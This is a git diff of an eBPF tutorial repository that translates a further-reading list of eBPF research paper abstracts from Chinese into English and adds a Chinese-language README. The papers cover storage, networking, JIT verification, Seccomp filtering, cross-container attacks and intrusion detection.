-我们的初步实验结果显示,与 Knative 相比,SPRIGHT 在吞吐量和延迟方面实现了一个数量级的提高,同时大大减少了 CPU 使用,并消除了 "冷启动"的需要。 +Our preliminary experimental results show that SPRIGHT achieves an order of magnitude improvement in throughput and latency compared to Knative, while substantially reducing CPU usage, and obviates the need for 'cold-start'. -## Kgent: Kernel Extensions Large Language Model Agent +## KEN: Kernel Extensions using Natural Language -修改和扩展操作系统的能力是提高系统安全性、可靠性和性能的重要功能。扩展的伯克利数据包过滤器(eBPF)生态系统已经成为扩展Linux内核的标准机制,并且最近已被移植到Windows。eBPF程序将新逻辑注入内核,使系统在现有逻辑之前或之后执行这些逻辑。虽然eBPF生态系统提供了一种灵活的内核扩展机制,但目前开发人员编写eBPF程序仍然困难。eBPF开发人员必须深入了解操作系统的内部结构,以确定在何处放置逻辑,并应对eBPF验证器对其eBPF程序的控制流和数据访问施加的编程限制。本文介绍了KEN,一种通过允许使用自然语言编写内核扩展来缓解编写eBPF程序难度的替代框架。KEN利用大语言模型(LLMs)的最新进展,根据用户的英文提示生成eBPF程序。为了确保LLM的输出在语义上等同于用户的提示,KEN结合了LLM增强的程序理解、符号执行和一系列反馈循环。KEN的关键创新在于这些技术的结合。特别是,该系统以一种新颖的结构使用符号执行,使其能够结合程序综合和程序理解的结果,并建立在LLMs在每个任务中单独展示的成功基础上。为了评估KEN,我们开发了一个新的自然语言提示eBPF程序的语料库。我们显示,KEN在80%的情况下生成了正确的eBPF程序,这比LLM增强的程序综合基线提高了2.67倍。 +The ability to modify and extend an operating system is an important feature for improving a system's security, reliability, and performance. The extended Berkeley Packet Filters (eBPF) ecosystem has emerged as the standard mechanism for extending the Linux kernel and has recently been ported to Windows. eBPF programs inject new logic into the kernel that the system will execute before or after existing logic. While the eBPF ecosystem provides a flexible mechanism for kernel extension, it is difficult for developers to write eBPF programs today. An eBPF developer must have deep knowledge of the internals of the operating system to determine where to place logic and cope with programming limitations on the control flow and data accesses of their eBPF program enforced by the eBPF verifier. This paper presents KEN, an alternative framework that alleviates the difficulty of writing an eBPF program by allowing Kernel Extensions to be written in Natural language. KEN uses recent advances in large language models (LLMs) to synthesize an eBPF program given a user's English language prompt. To ensure that LLM's output is semantically equivalent to the user's prompt, KEN employs a combination of LLM-empowered program comprehension, symbolic execution, and a series of feedback loops. KEN's key novelty is the combination of these techniques. In particular, the system uses symbolic execution in a novel structure that allows it to combine the results of program synthesis and program comprehension and build on the recent success that LLMs have shown for each of these tasks individually. To evaluate KEN, we developed a new corpus of natural language prompts for eBPF programs. We show that KEN produces correct eBPF programs on 80% which is an improvement of a factor of 2.67 compared to an LLM-empowered program synthesis baseline. 
-eBPF'24: 和arxiv +eBPF'24: and arxiv ## Programmable System Call Security with eBPF -利用 eBPF 进行可编程的系统调用安全 - -系统调用过滤是一种广泛用于保护共享的 OS 内核免受不受信任的用户应用程序威胁的安全机制。但是,现有的系统调用过滤技术要么由于用户空间代理带来的上下文切换开销过于昂贵,要么缺乏足够的可编程性来表达高级策略。Seccomp 是 Linux 的系统调用过滤模块,广泛用于现代的容器技术、移动应用和系统管理服务。尽管采用了经典的 BPF 语言(cBPF),但 Seccomp 中的安全策略主要限于静态的允许列表,主要是因为 cBPF 不支持有状态的策略。因此,许多关键的安全功能无法准确地表达,和/或需要修改内核。 - -在这篇论文中,我们介绍了一个可编程的系统调用过滤机制,它通过利用扩展的 BPF 语言(eBPF)使得更高级的安全策略得以表达。更具体地说,我们创建了一个新的 Seccomp eBPF 程序类型,暴露、修改或创建新的 eBPF 助手函数来安全地管理过滤状态、访问内核和用户状态,以及利用同步原语。重要的是,我们的系统与现有的内核特权和能力机制集成,使非特权用户能够安全地安装高级过滤器。我们的评估表明,我们基于 eBPF 的过滤可以增强现有策略(例如,通过时间专化,减少早期执行阶段的攻击面积高达55.4%)、缓解实际漏洞并加速过滤器。 +System call filtering is a widely used security mechanism for protecting a shared OS kernel against untrusted user applications. However, existing system call filtering techniques either are too expensive due to the context switch overhead imposed by userspace agents, or lack sufficient programmability to express advanced policies. Seccomp, Linux's system call filtering module, is widely used by modern container technologies, mobile apps, and system management services. Despite the adoption of the classic BPF language (cBPF), security policies in Seccomp are mostly limited to static allow lists, primarily because cBPF does not support stateful policies. Consequently, many essential security features cannot be expressed precisely and/or require kernel modifications. +In this paper, we present a programmable system call filtering mechanism, which enables more advanced security policies to be expressed by leveraging the extended BPF language (eBPF). More specifically, we create a new Seccomp eBPF program type, exposing, modifying or creating new eBPF helper functions to safely manage filter state, access kernel and user state, and utilize synchronization primitives. Importantly, our system integrates with existing kernel privilege and capability mechanisms, enabling unprivileged users to install advanced filters safely. Our evaluation shows that our eBPF-based filtering can enhance existing policies (e.g., reducing the attack surface of early execution phase by up to 55.4% for temporal specialization), mitigate real-world vulnerabilities, and accelerate filters. ## Cross Container Attacks: The Bewildered eBPF on Clouds -在云上困惑的 eBPF 之间的容器攻击 - -扩展的伯克利数据包过滤器(eBPF)为用户空间程序提供了强大而灵活的内核接口,通过在内核空间直接运行字节码来扩展内核功能。它已被云服务广泛使用,以增强容器安全性、网络管理和系统可观察性。然而,我们发现在 Linux 主机上广泛讨论的攻击性 eBPF 可以为容器带来新的攻击面。通过 eBPF 的追踪特性,攻击者可以破坏容器的隔离并攻击主机,例如,窃取敏感数据、进行 DoS 攻击,甚至逃逸容器。在这篇论文中,我们研究基于 eBPF 的跨容器攻击,并揭示其在实际服务中的安全影响。利用 eBPF 攻击,我们成功地妨害了五个在线的 Jupyter/交互式 Shell 服务和 Google Cloud Platform 的 Cloud Shell。此外,我们发现三家领先的云供应商提供的 Kubernetes 服务在攻击者通过 eBPF 逃逸容器后可以被利用来发起跨节点攻击。具体来说,在阿里巴巴的 Kubernetes 服务中,攻击者可以通过滥用他们过度特权的云指标或管理 Pods 来妨害整个集群。不幸的是,容器上的 eBPF 攻击鲜为人知,并且现有的入侵检测系统几乎无法发现它们。此外,现有的 eBPF 权限模型无法限制 eBPF 并确保在共享内核的容器环境中安全使用。为此,我们提出了一个新的 eBPF 权限模型,以对抗容器中的 eBPF 攻击。 +The extended Berkeley Packet Filter (eBPF) provides powerful and flexible kernel interfaces to extend the kernel functions for user space programs via running bytecode directly in the kernel space. It has been widely used by cloud services to enhance container security, network management, and system observability. However, we discover that the offensive eBPF that have been extensively discussed in Linux hosts can bring new attack surfaces to containers. With eBPF tracing features, attackers can break the container's isolation and attack the host, e.g., steal sensitive data, DoS, and even escape the container. 
In this paper, we study the eBPF-based cross container attacks and reveal their security impacts in real world services. With eBPF attacks, we successfully compromise five online Jupyter/Interactive Shell services and the Cloud Shell of Google Cloud Platform. Furthermore, we find that the Kubernetes services offered by three leading cloud vendors can be exploited to launch cross-node attacks after the attackers escape the container via eBPF. Specifically, in Alibaba's Kubernetes services, attackers can compromise the whole cluster by abusing their over-privileged cloud metrics or management Pods. Unfortunately, the eBPF attacks on containers are seldom known and can hardly be discovered by existing intrusion detection systems. Also, the existing eBPF permission model cannot confine the eBPF and ensure secure usage in shared-kernel container environments. To this end, we propose a new eBPF permission model to counter the eBPF attacks in containers. ## Comparing Security in eBPF and WebAssembly -比较 eBPF 和 WebAssembly 中的安全性 - -本文研究了 eBPF 和 WebAssembly(Wasm)的安全性,这两种技术近年来得到了广泛的采用,尽管它们是为非常不同的用途和环境而设计的。当 eBPF 主要用于 Linux 等操作系统内核时,Wasm 是一个为基于堆栈的虚拟机设计的二进制指令格式,其用途超出了 web。鉴于 eBPF 的增长和不断扩大的雄心,Wasm 可能提供有启发性的见解,因为它围绕在如 web 浏览器和云等复杂和敌对环境中安全执行任意不受信任的程序进行设计。我们分析了两种技术的安全目标、社区发展、内存模型和执行模型,并进行了比较安全性评估,探讨了内存安全性、控制流完整性、API 访问和旁路通道。我们的结果表明,eBPF 有一个首先关注性能、其次关注安全的历史,而 Wasm 更强调安全,尽管要支付一些运行时开销。考虑 eBPF 的基于语言的限制和一个用于 API 访问的安全模型是未来工作的有益方向。 +This paper examines the security of eBPF and WebAssembly (Wasm), two technologies that have gained widespread adoption in recent years, despite being designed for very different use cases and environments. While eBPF is a technology primarily used within operating system kernels such as Linux, Wasm is a binary instruction format designed for a stack-based virtual machine with use cases extending beyond the web. Recognizing the growth and expanding ambitions of eBPF, Wasm may provide instructive insights, given its design around securely executing arbitrary untrusted programs in complex and hostile environments such as web browsers and clouds. We analyze the security goals, community evolution, memory models, and execution models of both technologies, and conduct a comparative security assessment, exploring memory safety, control flow integrity, API access, and side-channels. Our results show that eBPF has a history of focusing on performance first and security second, while Wasm puts more emphasis on security at the cost of some runtime overheads. Considering language-based restrictions for eBPF and a security model for API access are fruitful directions for future work. -更多内容可以在第一个 eBPF 研讨会中找到: +More about can be found in the first workshop: ## A flow-based IDS using Machine Learning in eBPF -基于eBPF中的机器学习的流式入侵检测系统 - -eBPF 是一种新技术,允许动态加载代码片段到 Linux 内核中。它可以大大加速网络,因为它使内核能够处理某些数据包而无需用户空间程序的参与。到目前为止,eBPF 主要用于简单的数据包过滤应用,如防火墙或拒绝服务保护。我们证明在 eBPF 中完全基于机器学习开发流式网络入侵检测系统是可行的。我们的解决方案使用决策树,并为每个数据包决定它是否恶意,考虑到网络流的整个先前上下文。与作为用户空间程序实现的同一解决方案相比,我们实现了超过 20% 的性能提升。 +eBPF is a new technology which allows dynamically loading pieces of code into the Linux kernel. It can greatly speed up networking since it enables the kernel to process certain packets without the involvement of a userspace program. So far eBPF has been used for simple packet filtering applications such as firewalls or Denial of Service protection. We show that it is possible to develop a flow based network intrusion detection system based on machine learning entirely in eBPF. 
Our solution uses a decision tree and decides for each packet whether it is malicious or not, considering the entire previous context of the network flow. We achieve a performance increase of over 20% compared to the same solution implemented as a userspace program. ## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers -针对低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离: Femto-容器 - -低功耗的 IoT 微控制器上运行的操作系统运行时通常提供基础的 API、基本的连接性和(有时)一个(安全的)固件更新机制。相比之下,在硬件约束较少的场合,网络化软件已进入无服务器、微服务和敏捷的时代。考虑到弥合这一差距,我们在论文中设计了 Femto-容器,这是一种新的中间件运行时,可以嵌入到各种低功耗 IoT 设备中。Femto-容器使得可以在低功耗 IoT 设备上通过网络安全地部署、执行和隔离小型虚拟软件功能。我们实施了 Femto-容器,并在 RIOT 中提供了集成,这是一个受欢迎的开源 IoT 操作系统。然后,我们评估了我们的实现性能,它已被正式验证用于故障隔离,确保 RIOT 受到加载并在 Femto-容器中执行的逻辑的保护。我们在各种受欢迎的微控制器架构(Arm Cortex-M、ESP32 和 RISC-V)上的实验表明,Femto-容器在内存占用开销、能源消耗和安全性方面提供了有吸引力的权衡。 +Low-power operating system runtimes used on IoT microcontrollers typically provide rudimentary APIs, basic connectivity and, sometimes, a (secure) firmware update mechanism. In contrast, on less constrained hardware, networked software has entered the age of serverless, microservices and agility. With a view to bridge this gap, in the paper we design Femto-Containers, a new middleware runtime which can be embedded on heterogeneous low-power IoT devices. Femto-Containers enable the secure deployment, execution and isolation of small virtual software functions on low-power IoT devices, over the network. We implement Femto-Containers, and provide integration in RIOT, a popular open source IoT operating system. We then evaluate the performance of our implementation, which was formally verified for fault-isolation, guaranteeing that RIOT is shielded from logic loaded and executed in a Femto-Container. Our experiments on various popular micro-controller architectures (Arm Cortex-M, ESP32 and RISC-V) show that Femto-Containers offer an attractive trade-off in terms of memory footprint overhead, energy consumption, and security. 
+ +> The original link of this article: diff --git a/src/18-further-reading/README.zh.md b/src/18-further-reading/README.zh.md new file mode 100644 index 0000000..3a71301 --- /dev/null +++ b/src/18-further-reading/README.zh.md @@ -0,0 +1,149 @@ +# 更多的参考资料:论文、项目等等 + +可以在这里找到更多关于 eBPF 的信息: + +- 一个关于 eBPF 相关内容和信息的详细列表: +- eBPF 相关项目、教程: + +这是我近年来读过的与 eBPF 相关的论文列表,可能对于对 eBPF 相关研究感兴趣的人有所帮助。 + +eBPF(扩展的伯克利数据包过滤器)是一种新兴的技术,允许在 Linux 内核中安全地执行用户提供的程序。近年来,它因加速网络处理、增强可观察性和实现可编程数据包处理而得到了广泛的应用。此文档列出了过去几年关于 eBPF 的一些关键研究论文。这些论文涵盖了 eBPF 的几个方面,包括加速分布式系统、存储和网络,正式验证 eBPF 的 JIT 编译器和验证器,将 eBPF 用于入侵检测,以及从 eBPF 程序自动生成硬件设计。 + +一些关键亮点: + +- eBPF 允许在内核中执行自定义函数,以加速分布式协议、存储引擎和网络应用,与传统的用户空间实现相比,可以提高吞吐量和降低延迟。 +- eBPF 组件(如 JIT 和验证器)的正式验证确保了正确性,并揭示了实际实现中的错误。 +- eBPF 的可编程性和效率使其适合在内核中完全构建入侵检测和网络监控应用。 +- 从 eBPF 程序中自动生成硬件设计允许软件开发人员快速生成网络卡中的优化数据包处理管道。 + +这些论文展示了 eBPF 在加速系统、增强安全性和简化网络编程方面的多功能性。随着 eBPF 的采用不断增加,它是一个与性能、安全性、硬件集成和易用性相关的系统研究的重要领域。 + +如果您有任何建议或添加论文的意见,请随时开放一个问题或PR。此列表创建于 2023.10,未来将添加新的论文。 + +> 如果您对 eBPF 有些进一步的兴趣的话,也可以查看我们在 [eunomia-bpf](https://github.com/eunomia-bpf) 的开源项目和 [bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) 的 eBPF 教程。我也在寻找 2024/2025 年系统和网络领域的 PhD 相关机会,这是我的 [Github](https://github.com/yunwei37) 和 [邮箱](yunwei356@gmail.com)。 + +## XRP: In-Kernel Storage Functions with eBPF + +随着微秒级 NVMe 存储设备的出现,Linux 内核存储堆栈开销变得显著,几乎使访问时间翻倍。我们介绍了 XRP,一个框架,允许应用程序从 eBPF 在 NVMe 驱动程序中的钩子执行用户定义的存储功能,如索引查找或聚合,安全地绕过大部分内核的存储堆栈。为了保持文件系统的语义,XRP 将少量的内核状态传播到其 NVMe 驱动程序钩子,在那里调用用户注册的 eBPF 函数。我们展示了如何利用 XRP 显著提高两个键值存储,BPF-KV,一个简单的 B+ 树键值存储,和 WiredTiger,一个流行的日志结构合并树存储引擎的吞吐量和延迟。 + +OSDI '22 最佳论文: + +## Specification and verification in the field: Applying formal methods to BPF just-in-time compilers in the Linux kernel + +本文描述了我们将形式方法应用于 Linux 内核中的一个关键组件,即 Berkeley 数据包过滤器 (BPF) 虚拟机的即时编译器 ("JIT") 的经验。我们使用 Jitterbug 验证这些 JIT,这是第一个提供 JIT 正确性的精确规范的框架,能够排除实际错误,并提供一个自动化的证明策略,该策略可以扩展到实际实现。使用 Jitterbug,我们设计、实施并验证了一个新的针对 32 位 RISC-V 的 BPF JIT,在五个其他部署的 JIT 中找到并修复了 16 个之前未知的错误,并开发了新的 JIT 优化;所有这些更改都已上传到 Linux 内核。结果表明,在一个大型的、未经验证的系统中,通过仔细设计规范和证明策略,可以构建一个经过验证的组件。 + +OSDI 20: + +## λ-IO: A Unified IO Stack for Computational Storage + +新兴的计算存储设备为存储内计算提供了一个机会。它减少了主机与设备之间的数据移动开销,从而加速了数据密集型应用程序。在这篇文章中,我们介绍 λ-IO,一个统一的 IO 堆栈,跨主机和设备管理计算和存储资源。我们提出了一套设计 - 接口、运行时和调度 - 来解决三个关键问题。我们在全堆栈软件和硬件环境中实施了 λ-IO,并使用合成和实际应用程序对其 + +进行评估,与 Linux IO 相比,显示出高达 5.12 倍的性能提升。 + +FAST23: + +## Extension Framework for File Systems in User space + +用户文件系统相对于其内核实现提供了许多优势,例如开发的简易性和更好的系统可靠性。然而,它们会导致重大的性能损失。我们观察到现有的用户文件系统框架非常通用;它们由一个位于内核中的最小干预层组成,该层简单地将所有低级请求转发到用户空间。虽然这种设计提供了灵活性,但由于频繁的内核-用户上下文切换,它也严重降低了性能。 + +这项工作介绍了 ExtFUSE,一个用于开发可扩展用户文件系统的框架,该框架还允许应用程序在内核中注册"薄"的专用请求处理程序,以满足其特定的操作需求,同时在用户空间中保留复杂的功能。我们使用两个 FUSE 文件系统对 ExtFUSE 进行评估,结果表明 ExtFUSE 可以通过平均不到几百行的改动来提高用户文件系统的性能。ExtFUSE 可在 GitHub 上找到。 + +ATC 19: + +## Electrode: Accelerating Distributed Protocols with eBPF + +在标准的Linux内核网络栈下实现分布式协议可以享受到负载感知的CPU缩放、高兼容性以及强大的安全性和隔离性。但由于过多的用户-内核切换和内核网络栈遍历,其性能较低。我们介绍了Electrode,这是一套为分布式协议设计的基于eBPF的性能优化。这些优化在网络栈之前在内核中执行,但实现了与用户空间中实现的相似功能(例如,消息广播,收集ack的仲裁),从而避免了用户-内核切换和内核网络栈遍历所带来的开销。我们展示,当应用于经典的Multi-Paxos状态机复制协议时,Electrode可以提高其吞吐量高达128.4%,并将延迟降低高达41.7%。 + +NSDI 23: [链接](https://www.usenix.org/conference/nsdi23/presentation/zhou) + +## BMC: Accelerating Memcached using Safe In-kernel Caching and Pre-stack Processing + +内存键值存储是帮助扩展大型互联网服务的关键组件,通过提供对流行数据的低延迟访问。Memcached是最受欢迎的键值存储之一,由于Linux网络栈固有的性能限制,当使用高速网络接口时,其性能不高。虽然可以使用DPDK基础方案绕过Linux网络栈,但这种方法需要对软件栈进行完全重新设计,而且在客户端负载较低时也会导致高CPU利用率。 + 
+为了克服这些限制,我们提出了BMC,这是一个为Memcached设计的内核缓存,可以在执行标准网络栈之前服务于请求。对BMC缓存的请求被视为NIC中断的一部分,这允许性能随着为NIC队列服务的核心数量而扩展。为确保安全,BMC使用eBPF实现。尽管eBPF具有安全约束,但我们展示了实现复杂缓存服务是可能的。因为BMC在商用硬件上运行,并且不需要修改Linux内核或Memcached应用程序,所以它可以在现有系统上广泛部署。BMC优化了Facebook样式的小型请求的处理时间。在这个目标工作负载上,我们的评估显示,与原始的Memcached应用程序相比,BMC的吞吐量提高了高达18倍,与使用SO_REUSEPORT套接字标志的优化版Memcached相比,提高了高达6倍。此外,我们的结果还显示,对于非目标工作负载,BMC的开销可以忽略不计,并且不会降低吞吐量。 + +NSDI 21: [链接](https://www.usenix.org/conference/nsdi21/presentation/ghigoff) + +## hXDP: Efficient Software Packet Processing on FPGA NICs + +FPGA加速器在NIC上使得从CPU卸载昂贵的数据包处理任务成为可能。但是,FPGA有限的资源可能需要在多个应用程序之间共享,而编程它们则很困难。 + +我们提出了一种在FPGA上运行Linux的eXpress Data Path程序的解决方案,这些程序使用eBPF编写,仅使用可用硬件资源的一部分,同时匹配高端CPU的性能。eBPF的迭代执行模型不适合FPGA加速器。尽管如此,我们展示了,当针对一个特定的FPGA执行器时,一个eBPF程序的许多指令可以被压缩、并行化或完全删除,从而显著提高性能。我们利用这一点设计了hXDP,它包括(i)一个优化编译器,该编译器并行化并将eBPF字节码转换为我们定义的扩展eBPF指令集架构;(ii)一个在FPGA上执行这些指令的软处理器;以及(iii)一个基于FPGA的基础设施,提供XDP的maps和Linux内核中定义的helper函数。 + +我们在FPGA NIC上实现了hXDP,并评估了其运行真实世界的未经修改的eBPF程序的性能。我们的实现以156.25MHz的速度时钟,使用约15%的FPGA资源,并可以运行动态加载的程序。尽管有这些适度的要求,但它达到了高端CPU核心的数据包处理吞吐量,并提供了10倍低的数据包转发延迟。 + +OSDI 20: [链接](https://www.usenix.org/conference/osdi20/presentation/brunella) + +## Network-Centric Distributed Tracing with DeepFlow: Troubleshooting Your Microservices in Zero Code + +微服务正变得越来越复杂,给传统的性能监控解决方案带来了新的挑战。一方面,微服务的快速演变给现有的分布式跟踪框架的使用和维护带来了巨大的负担。另一方面,复杂的基础设施增加了网络性能问题的概率,并在网络侧创造了更多的盲点。在这篇论文中,我们介绍了 DeepFlow,一个用于微服务故障排除的以网络为中心的分布式跟踪框架。DeepFlow 通过一个以网络为中心的跟踪平面和隐式的上下文传播提供开箱即用的跟踪。此外,它消除了网络基础设施中的盲点,以低成本方式捕获网络指标,并增强了不同组件和层之间的关联性。我们从分析和实证上证明,DeepFlow 能够准确地定位微服务性能异常,而开销几乎可以忽略不计。DeepFlow 已经为超过26家公司发现了71多个关键性能异常,并已被数百名开发人员所使用。我们的生产评估显示,DeepFlow 能够为用户节省数小时的仪表化工作,并将故障排除时间从数小时缩短到几分钟。 + +SIGCOMM 23: + +## Fast In-kernel Traffic Sketching in eBPF + +扩展的伯克利数据包过滤器(eBPF)是一个基础设施,允许在不重新编译的情况下动态加载并直接在 Linux 内核中运行微程序。 + +在这项工作中,我们研究如何在 eBPF 中开发高性能的网络测量。我们以绘图为案例研究,因为它们具有支持广泛任务的能力,同时提供低内存占用和准确性保证。我们实现了 NitroSketch,一个用于用户空间网络的最先进的绘图,并表明用户空间网络的最佳实践不能直接应用于 eBPF,因为它的性能特点不同。通过应用我们学到的经验教训,我们将其性能提高了40%,与初级实现相比。 + +SIGCOMM 23: + +## SPRIGHT: extracting the server from serverless computing! 
high-performance eBPF-based event-driven, shared-memory processing + +无服务器计算在云环境中承诺提供高效、低成本的计算能力。然而,现有的解决方案,如Knative这样的开源平台,包含了繁重的组件,破坏了无服务器计算的目标。此外,这种无服务器平台缺乏数据平面优化,无法实现高效的、高性能的功能链,这也是流行的微服务开发范式的设施。它们为构建功能链使用的不必要的复杂和重复的功能严重降低了性能。"冷启动"延迟是另一个威慑因素。 + +我们描述了 SPRIGHT,一个轻量级、高性能、响应式的无服务器框架。SPRIGHT 利用共享内存处理显著提高了数据平面的可伸缩性,通过避免不必要的协议处理和序列化-反序列化开销。SPRIGHT 大量利用扩展的伯克利数据包过滤器 (eBPF) 进行事件驱动处理。我们创造性地使用 eBPF 的套接字消息机制支持共享内存处理,其开销严格与负载成正比。与常驻、基于轮询的DPDK相比,SPRIGHT 在真实工作负载下实现了相同的数据平面性能,但 CPU 使用率降低了10倍。此外,eBPF 为 SPRIGHT 带来了好处,替换了繁重的无服务器组件,使我们能够以微不足道的代价保持函数处于"暖"状态。 + +我们的初步实验结果显示,与 Knative 相比,SPRIGHT 在吞吐量和延迟方面实现了一个数量级的提高,同时大大减少了 CPU 使用,并消除了 "冷启动"的需要。 + + + +## Kgent: Kernel Extensions Large Language Model Agent + +修改和扩展操作系统的能力是提高系统安全性、可靠性和性能的重要功能。扩展的伯克利数据包过滤器(eBPF)生态系统已经成为扩展Linux内核的标准机制,并且最近已被移植到Windows。eBPF程序将新逻辑注入内核,使系统在现有逻辑之前或之后执行这些逻辑。虽然eBPF生态系统提供了一种灵活的内核扩展机制,但目前开发人员编写eBPF程序仍然困难。eBPF开发人员必须深入了解操作系统的内部结构,以确定在何处放置逻辑,并应对eBPF验证器对其eBPF程序的控制流和数据访问施加的编程限制。本文介绍了KEN,一种通过允许使用自然语言编写内核扩展来缓解编写eBPF程序难度的替代框架。KEN利用大语言模型(LLMs)的最新进展,根据用户的英文提示生成eBPF程序。为了确保LLM的输出在语义上等同于用户的提示,KEN结合了LLM增强的程序理解、符号执行和一系列反馈循环。KEN的关键创新在于这些技术的结合。特别是,该系统以一种新颖的结构使用符号执行,使其能够结合程序综合和程序理解的结果,并建立在LLMs在每个任务中单独展示的成功基础上。为了评估KEN,我们开发了一个新的自然语言提示eBPF程序的语料库。我们显示,KEN在80%的情况下生成了正确的eBPF程序,这比LLM增强的程序综合基线提高了2.67倍。 + +eBPF'24: 和arxiv + +## Programmable System Call Security with eBPF + +利用 eBPF 进行可编程的系统调用安全 + +系统调用过滤是一种广泛用于保护共享的 OS 内核免受不受信任的用户应用程序威胁的安全机制。但是,现有的系统调用过滤技术要么由于用户空间代理带来的上下文切换开销过于昂贵,要么缺乏足够的可编程性来表达高级策略。Seccomp 是 Linux 的系统调用过滤模块,广泛用于现代的容器技术、移动应用和系统管理服务。尽管采用了经典的 BPF 语言(cBPF),但 Seccomp 中的安全策略主要限于静态的允许列表,主要是因为 cBPF 不支持有状态的策略。因此,许多关键的安全功能无法准确地表达,和/或需要修改内核。 + +在这篇论文中,我们介绍了一个可编程的系统调用过滤机制,它通过利用扩展的 BPF 语言(eBPF)使得更高级的安全策略得以表达。更具体地说,我们创建了一个新的 Seccomp eBPF 程序类型,暴露、修改或创建新的 eBPF 助手函数来安全地管理过滤状态、访问内核和用户状态,以及利用同步原语。重要的是,我们的系统与现有的内核特权和能力机制集成,使非特权用户能够安全地安装高级过滤器。我们的评估表明,我们基于 eBPF 的过滤可以增强现有策略(例如,通过时间专化,减少早期执行阶段的攻击面积高达55.4%)、缓解实际漏洞并加速过滤器。 + + + +## Cross Container Attacks: The Bewildered eBPF on Clouds + +在云上困惑的 eBPF 之间的容器攻击 + +扩展的伯克利数据包过滤器(eBPF)为用户空间程序提供了强大而灵活的内核接口,通过在内核空间直接运行字节码来扩展内核功能。它已被云服务广泛使用,以增强容器安全性、网络管理和系统可观察性。然而,我们发现在 Linux 主机上广泛讨论的攻击性 eBPF 可以为容器带来新的攻击面。通过 eBPF 的追踪特性,攻击者可以破坏容器的隔离并攻击主机,例如,窃取敏感数据、进行 DoS 攻击,甚至逃逸容器。在这篇论文中,我们研究基于 eBPF 的跨容器攻击,并揭示其在实际服务中的安全影响。利用 eBPF 攻击,我们成功地妨害了五个在线的 Jupyter/交互式 Shell 服务和 Google Cloud Platform 的 Cloud Shell。此外,我们发现三家领先的云供应商提供的 Kubernetes 服务在攻击者通过 eBPF 逃逸容器后可以被利用来发起跨节点攻击。具体来说,在阿里巴巴的 Kubernetes 服务中,攻击者可以通过滥用他们过度特权的云指标或管理 Pods 来妨害整个集群。不幸的是,容器上的 eBPF 攻击鲜为人知,并且现有的入侵检测系统几乎无法发现它们。此外,现有的 eBPF 权限模型无法限制 eBPF 并确保在共享内核的容器环境中安全使用。为此,我们提出了一个新的 eBPF 权限模型,以对抗容器中的 eBPF 攻击。 + + + +## Comparing Security in eBPF and WebAssembly + +比较 eBPF 和 WebAssembly 中的安全性 + +本文研究了 eBPF 和 WebAssembly(Wasm)的安全性,这两种技术近年来得到了广泛的采用,尽管它们是为非常不同的用途和环境而设计的。当 eBPF 主要用于 Linux 等操作系统内核时,Wasm 是一个为基于堆栈的虚拟机设计的二进制指令格式,其用途超出了 web。鉴于 eBPF 的增长和不断扩大的雄心,Wasm 可能提供有启发性的见解,因为它围绕在如 web 浏览器和云等复杂和敌对环境中安全执行任意不受信任的程序进行设计。我们分析了两种技术的安全目标、社区发展、内存模型和执行模型,并进行了比较安全性评估,探讨了内存安全性、控制流完整性、API 访问和旁路通道。我们的结果表明,eBPF 有一个首先关注性能、其次关注安全的历史,而 Wasm 更强调安全,尽管要支付一些运行时开销。考虑 eBPF 的基于语言的限制和一个用于 API 访问的安全模型是未来工作的有益方向。 + + + +更多内容可以在第一个 eBPF 研讨会中找到: + +## A flow-based IDS using Machine Learning in eBPF + +基于eBPF中的机器学习的流式入侵检测系统 + +eBPF 是一种新技术,允许动态加载代码片段到 Linux 内核中。它可以大大加速网络,因为它使内核能够处理某些数据包而无需用户空间程序的参与。到目前为止,eBPF 主要用于简单的数据包过滤应用,如防火墙或拒绝服务保护。我们证明在 eBPF 中完全基于机器学习开发流式网络入侵检测系统是可行的。我们的解决方案使用决策树,并为每个数据包决定它是否恶意,考虑到网络流的整个先前上下文。与作为用户空间程序实现的同一解决方案相比,我们实现了超过 20% 的性能提升。 + + + +## Femto-containers: lightweight virtualization and fault isolation for small software functions on low-power IoT microcontrollers + +针对低功耗 IoT 微控制器上的小型软件功能的轻量级虚拟化和故障隔离: Femto-容器 + 
+低功耗的 IoT 微控制器上运行的操作系统运行时通常提供基础的 API、基本的连接性和(有时)一个(安全的)固件更新机制。相比之下,在硬件约束较少的场合,网络化软件已进入无服务器、微服务和敏捷的时代。考虑到弥合这一差距,我们在论文中设计了 Femto-容器,这是一种新的中间件运行时,可以嵌入到各种低功耗 IoT 设备中。Femto-容器使得可以在低功耗 IoT 设备上通过网络安全地部署、执行和隔离小型虚拟软件功能。我们实施了 Femto-容器,并在 RIOT 中提供了集成,这是一个受欢迎的开源 IoT 操作系统。然后,我们评估了我们的实现性能,它已被正式验证用于故障隔离,确保 RIOT 受到加载并在 Femto-容器中执行的逻辑的保护。我们在各种受欢迎的微控制器架构(Arm Cortex-M、ESP32 和 RISC-V)上的实验表明,Femto-容器在内存占用开销、能源消耗和安全性方面提供了有吸引力的权衡。 + + diff --git a/src/18-further-reading/README_en.md b/src/18-further-reading/README_en.md deleted file mode 100644 index 458612e..0000000 --- a/src/18-further-reading/README_en.md +++ /dev/null @@ -1,140 +0,0 @@ -# More Reference Materials: papers, projects - -You may find more about eBPF in these places: - -- A curated list of awesome projects related to eBPF: -- A website of eBPF projects and tutorials: - -This is also list of eBPF related papers I read in recent years, might be helpful for people who are interested in eBPF related research. - -eBPF (extended Berkeley Packet Filter) is an emerging technology that allows safe execution of user-provided programs in the Linux kernel. It has gained widespread adoption in recent years for accelerating network processing, enhancing observability, and enabling programmable packet processing. - -This document list some key research papers on eBPF over the past few years. The papers cover several aspects of eBPF, including accelerating distributed systems, storage, and networking, formally verifying the eBPF JIT compiler and verifier, applying eBPF for intrusion detection, and automatically generating hardware designs from eBPF programs. - -Some key highlights: - -- eBPF enables executing custom functions in the kernel to accelerate distributed protocols, storage engines, and networking applications with improved throughput and lower latency compared to traditional userspace implementations. -- Formal verification of eBPF components like JIT and verifier ensures correctness and reveals bugs in real-world implementations. -- eBPF's programmability and efficiency make it suitable for building intrusion detection and network monitoring applications entirely in the kernel. -- Automated synthesis of hardware designs from eBPF programs allows software developers to quickly generate optimized packet processing pipelines in network cards. - -The papers demonstrate eBPF's versatility in accelerating systems, enhancing security, and simplifying network programming. As eBPF adoption grows, it is an important area of systems research with many open problems related to performance, safety, hardware integration, and ease of use. - -If you have any suggestions or adding papers, please feel free to open an issue or PR. The list was created in 2023.10, New papers will be added in the future. - -> Check out our open-source projects at 